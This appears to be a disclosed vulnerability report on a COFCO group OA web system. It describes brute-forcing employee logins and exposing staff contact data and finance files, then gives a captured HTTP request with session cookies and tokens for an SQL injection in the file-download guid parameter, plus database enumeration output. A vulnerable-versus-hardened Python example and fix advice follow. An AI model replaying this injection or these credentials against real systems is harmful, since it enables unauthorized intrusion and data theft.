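2015-10-16: Details reported to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in the relevant field
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public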
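As the title says.
1. COFCO Group OA system: http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f
The login can be brute-forced; roughly a dozen accounts were cracked.
Logging in with one of them at random, it turned out to be a finance department supervisor's account.
The entire address book is viewable, leaking employees' mobile numbers and email addresses.
A large number of internal documents
Financial documents
2. SQL injection: the file download function is injectable.
Capturing the request shows that file names are renamed and stored in the database; a single quote triggers an error.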
GET /webdoc/file_download.aspx?guid=9969d7d40ef64d43b10cf2306a24b90a* HTTP/1.1
Host: oa.cofco-keystone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.cofco-keystone.com/frm/frm_flow_mainform.aspx?flow_ins_id=35076&flow_id=56&frm_id=72&id=0&hidbutton=true&Dialog=open
Cookie: ASP.NET_SessionId=pv1o1va1losavp453kg0fo55; LtpaToken=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; .ASPXAUTH=250164406A3B28308592637D653CED7B351F821F209BB2B9CA1CEFE01BB656133A12E508F84ECB9CE276F836A055D420B2225DAC268132D47E0CC4666512B1A99B3D7DD360CE927B9551CB611F251386FCA9CF5B09E029168B7BD49134B1C27EC483CDDC45D2B87F4F878C958DF8A72319ED879E; FIOA_EMP_ID=212; loginname=zhanglei; loginorg=1; FIOA_IMG_FOLDER=FI; lastLtpaTokenHeadKK=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; condition_is_in_cookie_0d650337a5854fcf=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_a1d79435d4d04641=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_cd9541d7cecd4cad=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29
Connection: keep-alive
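guid is the injectable parameter; the database connection has DBA privileges.
14 databases are involved.
The current database has nearly 1,000 tables.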
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: EIS
[978 tables]
I did not go any further.
Filter the parameter; fix the weak passwords.
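The "before" and "after" of the guid lookup described above, as an added example that is not code from the OA product or from the original report: the doc_file table, its columns and its row are constructed, and SQLite stands in for the SQL Server back end. The hardened handler allowlists the 32-hex guid format, binds the value as a parameter, returns generic errors instead of driver messages, and runs on a connection that cannot write (the stand-in for a non-DBA database login).

```python
import re
import sqlite3

# The guid in the captured request is 32 hex characters with no dashes.
GUID_RE = re.compile(r"[0-9a-fA-F]{32}")
KNOWN_GUID = "0" * 31 + "1"  # constructed sample value


def make_db():
    """Constructed stand-in for the file table; names and rows are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE doc_file (guid TEXT PRIMARY KEY, stored_name TEXT)")
    db.execute("INSERT INTO doc_file VALUES (?, ?)", (KNOWN_GUID, "renamed_0001.bin"))
    db.commit()
    # Least privilege: a download handler only reads, so the connection
    # refuses writes (on SQL Server: a login limited to SELECT, not DBA).
    db.execute("PRAGMA query_only = ON")
    return db


def download_vulnerable(db, guid):
    """'Before': the request value is concatenated into the SQL text."""
    sql = "SELECT stored_name FROM doc_file WHERE guid = '" + guid + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the driver error is what makes a stray quote visible to the client.
        return 500, "database error: %s" % exc
    return (200, row[0]) if row else (404, "not found")


def download_hardened(db, guid):
    """'After': allowlist the format, bind the value, keep errors generic."""
    if not isinstance(guid, str) or GUID_RE.fullmatch(guid) is None:
        return 400, "bad request"
    try:
        row = db.execute(
            "SELECT stored_name FROM doc_file WHERE guid = ?", (guid.lower(),)
        ).fetchone()
    except sqlite3.Error:
        return 500, "internal error"
    return (200, row[0]) if row else (404, "not found")


def writes_blocked(db):
    """True when the connection rejects a data change."""
    try:
        db.execute("DELETE FROM doc_file")
    except sqlite3.Error:
        return True
    finally:
        db.rollback()
    return False


if __name__ == "__main__":
    conn = make_db()
    for value in (KNOWN_GUID, KNOWN_GUID + "'"):
        print(repr(value))
        print("  vulnerable:", download_vulnerable(conn, value))
        print("  hardened:  ", download_hardened(conn, value))
    print("writes blocked:", writes_blocked(conn))
```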
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-10-19 09:24
Received. We will handle this as soon as possible. Thank you!
None yet